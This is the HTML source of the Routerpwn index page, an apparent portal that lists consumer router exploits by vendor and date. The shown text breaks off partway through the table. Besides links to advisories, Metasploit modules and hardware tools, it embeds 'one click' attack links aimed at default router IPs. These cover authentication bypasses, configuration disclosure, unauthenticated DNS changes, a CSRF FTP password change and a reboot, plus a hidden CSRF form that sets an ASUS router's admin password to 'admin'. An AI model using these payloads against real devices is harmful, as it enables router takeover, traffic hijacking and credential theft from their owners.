-
Notifications
You must be signed in to change notification settings - Fork 49
/
Copy pathindex.html
1282 lines (1280 loc) · 41.3 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
<!DOCTYPE html>
<html>
<head>
<title>Routerpwn - One click exploits, generators, tools, news, vulnerabilities, poc, alerts</title>
<link rel="apple-touch-icon" HREF="includes/images/favicon.png" />
<link rel="shortcut icon" HREF="includes/images/favicon.ico" />
<script src="includes/jquery-1.11.1.min.js"></script>
<script src="includes/jquery.dataTables.min.js"></script>
<script src="includes/dataTables.colReorder.js"></script>
<script src="includes/dataTables.colVis.js"></script>
<link rel="stylesheet" href="includes/jquery.dataTables.css"/>
<link rel="stylesheet" href="includes/dataTables.colVis.css"/>
<link rel="stylesheet" href="includes/menu.css">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="viewport" content="width=device-width">
<script src="includes/mobile.js"></script>
<link href='http://fonts.googleapis.com/css?family=PT+Sans' rel='stylesheet' type='text/css'>
<style>body { font-family: 'PT Sans', sans-serif; font-weight: 400; }</style>
<head>
<body>
<table width="925" align="center" cellspacing="0" style="background-image:url(includes/images/headerbeta.jpg); background-position:center 0px; background-repeat:no-repeat; ">
<tr><td><center><img src="includes/images/logo.gif"/></center></td></tr>
<tr><td>
<section class="container">
<nav>
<ul class="nav" id="menuList">
<li> </li>
<li class="active"><a href="/" title="Latest updates by brand">Home</a></li>
<li><a href="/Generators" title="Online key generators and algorithms">Generators</a></li>
<li><a href="/Tools" title="Recomended tools for router hacking">Tools</a></li>
<li><a href="https://github.com/hkm/routerpwn.com" title="Contribute to Routerpwn.com">Contribute</a></li>
<li><a href="https://twitter.com/routerpwn" title="Follow Routerpwn updates on Twitter">Follow</a></li>
<li><a href="/Contact" title="Contact us">Contact</a></li>
<li><a href="/About" title="About Routerpwn.com">About</a></li>
<li> </li>
</ul>
</nav>
</section>
</td></tr>
<tr><td>
<table class="display" cellspacing="0" width="100%" >
<section id="marcas">
<div>
<a href="2Wire/">
2Wire
</a>
</div>
<div>
<a href="3Com/">
3Com
</a>
</div>
<div>
<a href="Alcatel-Lucent/">
Alcatel-Lucent
</a>
</div>
<div>
<a href="Alpha-Networks/">
Alpha-Networks
</a>
</div>
<div>
<a href="Arris/">
Arris
</a>
</div>
<div>
<a href="Asmax/">
Asmax
</a>
</div>
<div>
<a href="Asus/">
Asus
</a>
</div>
<div>
<a href="Astoria/">
Astoria
</a>
</div>
<div>
<a href="Belkin/">
Belkin
</a>
</div>
<div>
<a href="Binatone/">
Binatone
</a>
</div>
<div>
<a href="Cisco/">
Cisco
</a>
</div>
<div>
<a href="Cobham/">
Cobham
</a>
</div>
<div>
<a href="Comtrend/">
Comtrend
</a>
</div>
<div>
<a href="D-Link/">
<font color="#7a80dd">D-Link</font>
</a>
</div>
<div>
<a href="DD-WRT/">
DD-WRT
</a>
</div>
<div>
<a href="EasyBox/">
EasyBox
</a>
</div>
<div>
<a href="EE/">
EE
</a>
</div>
<div>
<a href="Fibrehome/">
Fibrehome
</a>
</div>
<div>
<a href="Freebox/">
Freebox
</a>
</div>
<div>
<a href="Huawei/">
Huawei
</a>
</div>
<div>
<a href="Linksys/">
Linksys
</a>
</div>
<div>
<a href="MiFi/">
MiFi
</a>
</div>
<div>
<a href="Motorola/">
Motorola
</a>
</div>
<div>
<a href="Netgear/">
<font color="#7a80dd">Netgear</font>
</a>
</div>
<div>
<a href="Observa-Telecom/">
Observa
</a>
</div>
<div>
<a href="Pirelli/">
Pirelli
</a>
</div>
<div>
<a href="zynos/">
Rom-0
</a>
</div>
<div>
<a href="RugeddCom/">
RugeddCom
</a>
</div>
<div>
<a href="Sagem/">
Sagem
</a>
</div>
<div>
<a href="Seagate/">
Seagate
</a>
</div>
<div>
<a href="Siemens/">
Siemens
</a>
</div>
<div>
<a href="Sitecom/">
Sitecom
</a>
</div>
<div>
<a href="Sitel/">
Sitel
</a>
</div>
<div>
<a href="SMC/">
SMC
</a>
</div>
<div>
<a href="Starbridge/">
Starbridge
</a>
</div>
<div>
<a href="Technicolor/">
<font color="#7a80dd">Technicolor</font>
</a>
</div>
<div>
<a href="Thomson/">
Thomson
</a>
</div>
<div>
<a href="TP-LINK/">
TP-LINK
</a>
</div>
<div>
<a href="TRENDnet/">
TRENDnet
</a>
</div>
<div>
<a href="Ubee/">
Ubee / Ambit
</a>
</div>
<div>
<a href="Ubiquiti/">
Ubiquiti
</a>
</div>
<div>
<a href="Unicorn/">
Unicorn
</a>
</div>
<div>
<a href="UTStarcom/">
UTStarcom
</a>
</div>
<div>
<a href="Xavi/">
Xavi
</a>
</div>
<div>
<a href="Zhone/">
Zhone
</a>
</div>
<div>
<a href="Zoom/">
Zoom
</a>
</div>
<div>
<a href="ZTE/">
ZTE
</a>
</div>
<div>
<a href="ZyXEL/">
ZyXEL
</a>
</div>
</section>
</table>
<table id="tabla" class="display" cellspacing="0" width="100%" >
<thead>
<tr>
<th>Date</th>
<th>Category</th>
<th>Source</th>
<th>Title</th>
<th>Author</th>
</tr>
</thead>
<tfoot>
<tr>
<th>Date</th>
<th>Category</th>
<th>Source</th>
<th>Title</th>
<th>Author</th>
</tr>
</tfoot>
<tbody>
<tr>
<td>2015/10/15</td>
<td><a href="http://www.unicorn-engine.org/">unicorn-engine<a></td>
<td>Unicorn is a lightweight, multi-platform, multi-architecture CPU emulator framework based on QEMU.</td>
<td><a href="http://www.unicorn-engine.org/">unicorn-engine</a></td>
</tr>
<tr>
<td>2016/02/10</td>
<td>Metasploit module</td>
<td><a href="https://www.exploit-db.com/">Exploit-DB</a></td>
<td><a href="https://www.exploit-db.com/exploits/39437/">D-Link DCS-930L Authenticated Remote Command Execution</a></td>
<td>Nicholas Starke</td>
</tr>
<tr>
<td>2015/10/08</td>
<td>One click</td>
<td><a href="http://seclists.org/fulldisclosure/2015/Oct/29">Full Disclosure</a></td>
<td>
<a href="javascript:n300d_bypassauth()">Netgear JNR1010v2 WNR614 WNR618 JWNR2000v5 WNR2020 JWNR2010v5 WNR1000v4 Authentication Bypass</a>
<a href="javascript:n300d_bypassauth(ip)" onclick="return ip=prompt('IP:');">[SET IP]</a>
</td>
<td>Santhosh Kumar</td>
</tr>
<tr>
<td>2015/11/01</td>
<td>One click</td>
<td><a href="http://meat.pisto.horse/2015/11/rooting-linksys-x2000-router-system.html">meat.pisto.horse</a></td>
<td>
<a href="javascript:x2000_command()">X2000 - Remote Command Execution</a>
<a href="javascript:x2000_command(ip)" onclick="return ip=prompt('IP:');">[SET IP]</a>
</td>
<td>pisto</td>
</tr>
<tr>
<td>2013/05/19</td>
<td>One click</td>
<td><a href="https://www.youtube.com/watch?v=HY-FaLsycJo">YouTube</a></td>
<td>
<a href="http://192.168.1.1/comm/wan_cfg.sjs">Technicolor TD5130 - WAN Configuration Disclosure</a>
<a href="javascript:setip('comm/wan_cfg.sjs');">[SET IP]</a>
</td>
<td>TechnicolorTD5130</td>
</tr>
<tr>
<td>2013/05/19</td>
<td>One click</td>
<td><a href="https://www.youtube.com/watch?v=HY-FaLsycJo">YouTube</a></td>
<td>
<a href="http://192.168.1.1/comm/lan_comm.sjs">Technicolor TD5130 - LAN Configuration Disclosure</a>
<a href="javascript:setip('comm/lan_comm.sjs');">[SET IP]</a>
</td>
<td>TechnicolorTD5130</td>
</tr>
<tr>
<td>2013/05/19</td>
<td>One click</td>
<td><a href="https://www.youtube.com/watch?v=HY-FaLsycJo">YouTube</a></td>
<td>
<a href="http://192.168.1.1/comm/firewall.sjs">Technicolor TD5130 - Firewall Configuration Disclosure</a>
<a href="javascript:setip('comm/firewall.sjs');">[SET IP]</a>
</td>
<td>TechnicolorTD5130</td>
</tr>
<tr>
<td>2013/01/31</td>
<td>Advisory</td>
<td><a href="http://www.hakim.ws/">Hakim.ws</a></td>
<td><a href="http://www.hakim.ws/2013/01/puerta-trasera-en-technicolor-tg582n/">TG582n - Backdoor</a></td>
<td>hkm</td>
</tr>
<tr>
<td>
2014/12/08
</td>
<td>
One click
</td>
<td>
<a href="https://www.underground.org.mx/index.php/topic,29919.0.html">
Comunidad Underground de México
</a>
</td>
<td>
<a href="http://192.168.0.1/uir//">
D-Link DIR-514 - Authentication Bypass
</a>
<a href="javascript:setip('/uir//');">
[SET IP]
</a>
</td>
<td>
flexlm
</td>
</tr>
<tr>
<td>
2014/12/09
</td>
<td>
One click
</td>
<td>
<a href="https://www.underground.org.mx/index.php/topic,29919.0.html">
Comunidad Underground de México
</a>
</td>
<td>
<a href="http://192.168.0.1/uir//tmp/csman/0">
D-Link DIR-514 - Configuration Disclosure
</a>
<a href="javascript:setip('/uir//tmp/csman/0');">
[SET IP]
</a>
</td>
<td>
flexlm
</td>
</tr>
<tr>
<td>2015/09/23</td>
<td>Tools</td>
<td><a href="https://thehackerblog.com/sonar-a-framework-for-scanning-and-exploiting-internal-hosts-with-a-webpage/index.html#comments">The Hacker Blog</a></td>
<td>A framework for identifying and launching exploits against internal network hosts. Works via WebRTC IP enumeration, WebSocket host scanning, and external resource fingerprinting.</td>
<td><a href="https://twitter.com/IAmMandatory">mandatory</a></td>
</tr>
<tr>
<td>2015/09/15</td>
<td>Tools</td>
<td><a href="https://github.com/devttys0/">devttys0</a></td>
<td>Sasquatch is a modified unsquashfs utility that attempts to support as many hacked-up vendor-specific SquashFS implementations as possible.</td>
<td><a href="https://github.com/devttys0/">devttys0</a></td>
</tr>
<tr>
<td>2014/06/21</td>
<td>One click</td>
<td><a href="http://websecurity.com.ua/7179/">websecurity</a></td>
<td><a href="http://websecurity.com.ua/7179/">D-Link DAP-1360 CSRF and information disclosure</a></td>
<td>MustLive</td>
</tr>
<tr>
<td>2014/06/21</td>
<td>One click</td>
<td><a href="http://websecurity.com.ua/7215/">websecurity</a></td>
<td><a href="http://websecurity.com.ua/7215/">D-Link DAP-1360 XSS & CSRF</a></td>
<td>MustLive</td>
</tr>
<tr>
<td>2015/06/08</td>
<td>One click</td>
<td><a href="https://www.exploit-db.com/exploits/37237/">exploit-db</a></td>
<td><a href="javascript:setip('/dnscfg.cgi?dnsSecondary='+dns+'&dnsIfcsList=&dnsRefresh=1')" onclick="javascript:dns=prompt('New DNS server:')">D-Link DSL-526B ADSL2+ AU_2.01 - Unauthenticated Remote DNS Change</a></td>
<td>Dawid Czagan</td>
</tr>
<tr>
<td>2015/01/10</td>
<td>Advisory PoC</td>
<td><a href="https://www.redteam-pentesting.de/">RedTeam Pentesting</a></td>
<td><a href="http://www.securityfocus.com/archive/1/535731">OmniSwitch 6450, 6250, 6850E, 9000E, 6400, 6855 OmniSwitch Web Interface Weak Session ID</a></td>
<td>RedTeam Pentesting</td>
</tr>
<tr>
<td>2015/06/08</td>
<td>One click</td>
<td><a href="http://resources.infosecinstitute.com/csrf-unauthorized-remote-admin-access/">search-lab</a></td>
<td><a href="javascript:setip('/dnscfg.cgi?dnsSecondary='+dns+'&dnsDynamic=0&dnsRefresh=1')" onclick="javascript:dns=prompt('New DNS server:')">D-Link DSL-526B ADSL2+ AU_2.01 - Unauthenticated Remote DNS Change</a></td>
<td>Dawid Czagan</td>
</tr>
<tr>
<td>2015/05/27</td>
<td>Advisory</td>
<td><a href="http://www.search-lab.hu/media/D-Link_Security_advisory_3_0_public.pdf">search-lab</a></td>
<td><a href="http://www.search-lab.hu/media/D-Link_Security_advisory_3_0_public.pdf">Multiple vulnerabilities in D-LINK DNS-320, DNS-320l, DNS-327l, and DNR-326 devices</a></td>
<td>Gergely Eberhardt</td>
</tr>
<tr>
<form name="rt632csrf" action="http://site/start_apply.htm" method="post">
<input type="hidden" name="http_passwd" value="admin">
<input type="hidden" name="http_passwd2" value="admin">
<input type="hidden" name="v_password2" value="admin">
<input type="hidden" name="action_mode" value="+Apply+">
</form>
<td>2015/02/28</td>
<td>One click</td>
<td><a href="http://websecurity.com.ua/7644/">websecurity</a></td>
<td><a href="javascript:rt632csrfx(ip)" onclick="return ip=prompt('IP:');">ASUS RT-G32 CSRF Add admin:admin account</a></td>
<td>MustLive</td>
</tr>
<tr>
<td>2015/06/28</td>
<td>Advisory</td>
<td><a href="https://tangiblesecurity.com/index.php/2015-06-28-20-46-00/tangible-security-researchers-notified-and-assisted-d-link-with-fixing-critical-device-vulnerabilities">Tangible Security</a></td>
<td><a href="https://tangiblesecurity.com/index.php/2015-06-28-20-46-00/tangible-security-researchers-notified-and-assisted-d-link-with-fixing-critical-device-vulnerabilities">D-Link DCS-930L DCS-931L DCS-932L DCS-933L DCS-931L - Allows Authenticated User Unrestricted File Upload - CSRF - FW 1.04 and Older</a></td>
<td>Allen Harper</td>
</tr>
<tr>
<td>2015/06/16</td>
<td>Advisory PoC</td>
<td><a href="http://www.vulnerability-lab.com/get_content.php?id=1522">vulnerability-lab</a></td>
<td><a href="http://www.vulnerability-lab.com/get_content.php?id=1522">ZTE ZXV10 W300 v3.1.0c_DR0 - UI Session Vulnerability</a></td>
<td>Hadji Samir</td>
</tr>
<tr>
<td>2014/05/16</td>
<td>Advisory PoC</td>
<td><a href="https://community.rapid7.com/community/metasploit/blog/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string">Rapid7</a></td>
<td><a href="https://community.rapid7.com/community/metasploit/blog/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string">Ubee DDW3611 & Ambit U10C019 Configuration disclosure via SNMP public string</a></td>
<td>Deral Heiland</td>
</tr>
<tr>
<td>2014/05/16</td>
<td>Advisory PoC</td>
<td><a href="https://community.rapid7.com/community/metasploit/blog/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string">Rapid7</a></td>
<td><a href="https://community.rapid7.com/community/metasploit/blog/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string">Motorola Netopia 3347 Configuration disclosure via SNMP public string</a></td>
<td>Deral Heiland</td>
</tr>
<tr>
<td>2010/12/27</td>
<td>Advisory PoC</td>
<td><a href="http://foro.seguridadwireless.net/puntos-de-acceso-routers-switchs-y-bridges/bug-en-repetidor-netgear-wn2000rpt-v2/">seguridadwireless</a></td>
<td><a href="javscript:setip('/cgi-bin/upg_reboot.cgi')">NetGear WN2000RPT v2 Authentication Bypass Reboot</a></td>
<td>Boombox</td>
</tr>
<tr>
<td>2015/06/27</td>
<td>Advisory PoC</td>
<td><a href="http://cxsecurity.com/issue/WLB-2015060167">cxsecurity</a></td>
<td><a href="http://cxsecurity.com/issue/WLB-2015060167">NetGear ProSafe SRX5308 FVS336Gv3 FVS336Gv2 FVS318N v4.3.2-7 and v4.3.3-3 Cross Site Scripting / SQL Injection / Header Injection</a></td>
<td>Juan J. Güelfo</td>
</tr>
<tr>
<td>2015/05/28</td>
<td>Tools</td>
<td><a href="http://www.nirsoft.net/utils/router_password_recovery.html">nirsoft<a></td>
<td><a href="http://www.nirsoft.net/utils/router_password_recovery.html">RouterPassView v1.57 - Recover lost password from router backup file. Remember to run in command line for full router support.</a></td>
<td>nirsoft</td>
</tr>
<tr>
<td>2015/06/10</td>
<td>Advisory PoC</td>
<td><a href="http://8thbit.net/blog/آسیب-پذیری-firmware-جدید-مودم-های-tp-link-td-w8961nd/">8thbit.net</a></td>
<td><a href="http://8thbit.net/blog/آسیب-پذیری-firmware-جدید-مودم-های-tp-link-td-w8961nd/">TP-Link W8961DN v3 rom0 download via C6 cookie</a></td>
<td>Koorosh Ghorbani</td>
</tr>
<tr>
<td>2015/04/10</td>
<td>Analysis PoC</td>
<td><a href="http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/">/dev/ttys0</a></td>
<td><a href="http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/">D-Link DAP-1522 revB, DAP-1650 revB, DIR-890L, DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB DIR-815 revB, DIR-300 revB, DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR HNAP SOAPAction-Header Command Execution</a></td>
<td>Craig Heffner</td>
</tr>
<tr>
<td>2015/05/05</td>
<td>Metasploit module</td>
<td><a href="http://www.rapid7.com/db/modules/exploit/linux/http/dlink_hnap_header_exec_noauth">Rapid7</a></td>
<td><a href="http://www.rapid7.com/db/modules/exploit/linux/http/dlink_hnap_header_exec_noauth">D-Link DAP-1522 revB, DAP-1650 revB, DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB DIR-815 revB, DIR-300 revB, DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR HNAP SOAPAction-Header Command Execution</a></td>
<td>Samuel Huntley, Craig Heffner, Michael Messner</td>
</tr>
<tr>
<td>2015/02/13</td>
<td>Advisory PoC</td>
<td><a href="http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10051">D-Link</a></td>
<td><a href="http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10051">D-Link DIR-645 FW 1.04b12 Command Injection</a></td>
<td>Samuel Huntley</td>
</tr>
<tr>
<td>2013/10/24</td>
<td>Analysis PoC</td>
<td><a href="http://shadow-file.blogspot.mx/">Shadow-file</a></td>
<td><a href="http://shadow-file.blogspot.mx/2013/10/netgear-root-compromise-via-command.html">NetGearD-Link wndr3700v4 Command Injection</a></td>
<td>Zach Cutlip</td>
</tr>
<tr>
<td>2015/02/11</td>
<td>Analysis PoC</td>
<td><a href="http://www.kernelpicnic.net">Kernelpicnic</a></td>
<td><a href="http://www.kernelpicnic.net/2015/02/11/NetGear-SOAPWNDR-Authentication-Bypass.html">NetGear SOAPWNDR Authentication Bypass</a></td>
<td>Peter Adkins</td>
</tr>
<tr>
<td>2015/02/26</td>
<td>Advisory PoC</td>
<td><a href="http://www.kernelpicnic.net">Kernelpicnic</a></td>
<td><a href="http://www.kernelpicnic.net/2015/02/26/D-Link-and-TRENDnet-ncc2-service.html">TRENDnet Multiple vulnerabilities in D-Link and TRENDnet 'ncc2' service</a></td>
<td>Peter Adkins</td>
</tr>
<tr>
<td>2015/06/11</td>
<td>Advisory PoC</td>
<td><a href="http://www.kernelpicnic.net">Kernelpicnic</a></td>
<td><a href="http://www.kernelpicnic.net/2015/02/26/D-Link-and-TRENDnet-ncc2-service.html">D-Link Multiple vulnerabilities in D-Link and TRENDnet 'ncc2' service</a></td>
<td>Peter Adkins</td>
</tr>
<tr>
<td>2015/06/11</td>
<td>One click</td>
<td><a href="http://www.kernelpicnic.net">Kernelpicnic</a></td>
<td><a href="javascript:setip('/mplist.txt')">D-Link DSP-W110 (Rev A) v1.05b01 Information Disclosure WLAN SSID, MAC, Versions</a></td>
<td>Peter Adkins</td>
</tr>
<tr>
<td>2015/06/11</td>
<td>Advisory PoC</td>
<td><a href="http://www.kernelpicnic.net">Kernelpicnic</a></td>
<td><a href="https://github.com/darkarnium/secpub/tree/master/D-Link/DSP-W110">D-Link DSP-W110 (Rev A) v1.05b01 Arbitrary command execution / SQL Injection / file upload</a></td>
<td>Peter Adkins</td>
</tr>
<tr>
<td>2015/06/29</td>
<td>One click</td>
<td><a href="#">Daniel Cisa</a></td>
<td><a href="javascript:ztef660_config()">ZTE F660 V2.22.21 Authentication Bypass Download config </a><a href="javascript:ztef660_config(prompt('IP'))">[SET IP]</td>
<td>Daniel Cisa</td>
</tr>
<tr>
<td>
2015/01/30
</td>
<td>
Generator
</td>
<td>
<a href="http://sn4kebites.altervista.org/">
sn4kebites
</a>
</td>
<td>
<a href="http://sn4kebites.altervista.org/">
Pirelli Alice Telecom Italia SSID Alice-########
</a>
</td>
<td>
Dren
</td>
</tr>
<tr>
<td>2015/01/30</td>
<td>One click</td>
<td><a href="http://www.routerpwn.com">Routerpwn</a></td>
<td><a href="javascript:setip('/reboot.html')">D-Link DSL-2680 Authentication Bypass Reboot</a></td>
<td>Dren</td>
</tr>
<tr>
<td>
2015/06/28
</td>
<td>Generator</td>
<td>
<a href="http://www.websec.mx/advisories/">
Websec
</a>
</td>
<td>
<a href="http://www.routerpwn.com/vecinitum-de-fibra">
Alcatel-Lucent 240W - Vecinitum de fibra
</a>
</td>
<td>
Luis Colunga
</td>
</tr>
<tr>
<td>2015/06/16</td>
<td>Tools</td>
<td><a href="http://dangerousprototypes.com/docs/Bus_Pirate">Bus Pirate<a></td>
<td>Bus Pirate is a universal bus interface that talks to electronics from a computer serial terminal. Protocols 1-Wire, I2C, SPI, JTAG, asynchronous serial (UART), MIDI, PC keyboard, HD44780 LCDs, and generic 2- and 3-wire libraries for custom protocols.</td>
<td><a href="http://dangerousprototypes.com/forum/viewforum.php?f=4">Dangerous Prototypes</a></td>
</tr>
<tr>
<td>2015/05/21</td>
<td>Tools</td>
<td><a href="https://github.com/rapid7/ssh-badkeys">Rapid7<a></td>
<td>SSH-BADKEYS: A collection of static SSH keys (public and private) that have made their way into software and hardware products. Inspired by the <a href="https://code.google.com/p/littleblackbox/">Little Black Box</a> project, but focused primarily on SSH (as opposed SSL) keys. Currently has Array Networks, Ceragon Fibeair, F5 BigIP, loadbalancer.org enterprise, quantum dxi v1000, vagrant and tandberg.</td>
<td><a href="http://www.rapid7.com">hdmoore</a></td>
</tr>
<tr>
<td>
2015/05/28
</td>
<td>
Advisory
</td>
<td>
<a href="https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20150519-0_KCodes_NetUSB_Kernel_Stack_Buffer_Overflow_v10.txt">
SEC Consult
</a>
</td>
<td>
<a href="https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20150519-0_KCodes_NetUSB_Kernel_Stack_Buffer_Overflow_v10.txt">
D-Link DIR-615 C NetUSB Kernel Stack Buffer Overflow</a>
</td>
<td>
SEC Consult Vulnerability Lab
</td>
</tr>
<tr>
<td>
2015/05/28
</td>
<td>
Advisory
</td>
<td>
<a href="https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20150519-0_KCodes_NetUSB_Kernel_Stack_Buffer_Overflow_v10.txt">
SEC Consult
</a>
</td>
<td>
<a href="https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20150519-0_KCodes_NetUSB_Kernel_Stack_Buffer_Overflow_v10.txt">
TP-LINK NetUSB Archer C2 V1.0 C5 V2.0 C7 V2.0 C8 C9 D2 D5 D7 D7B D9 VR200 TC-VG3XXX TC-W1XXX TD-W8XXX TD-W9XXX TL-WRXXXX TX-VG1530</a>
</td>
<td>
SEC Consult Vulnerability Lab
</td>
</tr>
<tr>
<td>
2015/05/28
</td>
<td>
Advisory
</td>
<td>
<a href="https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20150519-0_KCodes_NetUSB_Kernel_Stack_Buffer_Overflow_v10.txt">
SEC Consult
</a>
</td>
<td>
<a href="https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20150519-0_KCodes_NetUSB_Kernel_Stack_Buffer_Overflow_v10.txt">
TRENDnet NetUSB TE100-MFP1 TEW-6XXXXX TEW-8XXXXX TEW-MFP1</a>
</td>
<td>
SEC Consult Vulnerability Lab
</td>
</tr>
<tr>
<td>
2015/05/28
</td>
<td>
Advisory
</td>
<td>
<a href="https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20150519-0_KCodes_NetUSB_Kernel_Stack_Buffer_Overflow_v10.txt">
SEC Consult
</a>
</td>
<td>
<a href="https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20150519-0_KCodes_NetUSB_Kernel_Stack_Buffer_Overflow_v10.txt">
Netgear NetUSB AC1450 D6X00 DC112A DGND4000 EX6200 EX7000 JNR3XXX JR6XXX PR2000 R6XXX R7XXX WN3XXXXX WNDR4XXX XAU2511</a>
</td>
<td>
SEC Consult Vulnerability Lab
</td>
</tr>
<tr>
<td>
2015/05/28
</td>
<td>
Advisory
</td>
<td>
<a href="http://seclists.org/fulldisclosure/2015/May/129">
Full Disclosure
</a>
</td>
<td>
<a href="http://seclists.org/fulldisclosure/2015/May/129">
Observa-Telecom VH4032N VH4032N_V0.2.35 Universal Plug and Play</a>
</td>
<td>
Alvaro Folgado, Jose Rodriguez, Ivan Sanz
</td>
</tr>
<tr>
<td>
2015/05/28
</td>
<td>
Advisory
</td>
<td>
<a href="http://seclists.org/fulldisclosure/2015/May/129">
Full Disclosure
</a>
</td>
<td>
<a href="http://seclists.org/fulldisclosure/2015/May/129">
Observa-Telecom VH4032N VH4032N_V0.2.35 USB Device Bypass Authentication</a>
</td>
<td>
Alvaro Folgado, Jose Rodriguez, Ivan Sanz
</td>
</tr>
<tr>
<td>
2015/05/28
</td>
<td>
Advisory
</td>
<td>
<a href="http://seclists.org/fulldisclosure/2015/May/129">
Full Disclosure
</a>
</td>
<td>
<a href="http://seclists.org/fulldisclosure/2015/May/129">
Observa-Telecom VH4032N VH4032N_V0.2.35 Bypass Authentication using SMB Symlinks</a>
</td>
<td>
Alvaro Folgado, Jose Rodriguez, Ivan Sanz
</td>
</tr>
<tr>
<td>
2015/05/28
</td>
<td>
One click
</td>
<td>
<a href="http://seclists.org/fulldisclosure/2015/May/129">
Full Disclosure
</a>
</td>
<td>
<a href="http://192.168.0.1/en_US/config_ftp.cgi?ftpEnabled=1&ftpUserName=vodafone&ftpPassword=vulnpass&ftpPort=21&ftpAclMode=2">
Observa-Telecom VH4032N VH4032N_V0.2.35 CSRF change FTP password</a>
<a href="javascript:document.location='http://'+prompt('IP')+'/en_US/config_ftp.cgi?ftpEnabled=1&ftpUserName=vodafone&ftpPassword='+prompt('New password')+'&ftpPort=21&ftpAclMode=2'">
[SET IP]
</a>
</td>
<td>
Alvaro Folgado, Jose Rodriguez, Ivan Sanz
</td>
</tr>
<tr>
<td>
2015/05/28
</td>
<td>
One click
</td>
<td>
<a href="http://seclists.org/fulldisclosure/2015/May/129">
Full Disclosure
</a>
